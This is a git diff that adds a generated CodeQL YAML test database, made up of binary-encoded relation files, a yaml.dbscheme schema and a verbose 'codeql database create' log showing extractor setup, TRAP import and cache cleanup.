zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..5f848073652e137ce970cd362a76f858865fd7c4 GIT binary patch literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea GIT binary patch literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..573ab48b75431cf7a24d52077aa8a0371ccb9604 GIT binary patch literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..7aae4dc38a0fef1277b98a50776a547dd54eafc3 GIT binary patch literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme new file mode 100755 index 000000000000..20d83c71ee67 --- /dev/null +++ b/ql/lib/test-db/db-yaml/yaml.dbscheme @@ -0,0 +1,80 @@ +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log new file mode 100644 index 000000000000..8c7f3e173b71 --- /dev/null +++ b/ql/lib/test-db/log/database-create-20240203.101754.571.log @@ -0,0 +1,275 @@ +[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test +[2024-02-03 10:17:54] Log file was started late. +[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test +[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). +[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:54] Plumbing command codeql database init completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... +[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 +[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) +[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:55] Merging 1 fragment for 'files'. +[2024-02-03 10:17:55] Merged 8 bytes for 'files'. +[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. +[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. +[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Saving string and id pools to disk. +[2024-02-03 10:17:55] Finished importing TRAP files. +[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. +[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) +[2024-02-03 10:17:55] String pool size: 2.05 MiB +[2024-02-03 10:17:55] ID pool size: 1.03 MiB +[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). +[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. +[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 +[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). +[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). +[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log new file mode 100644 index 000000000000..858ec59a13da --- /dev/null +++ b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log @@ -0,0 +1,15 @@ +[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml 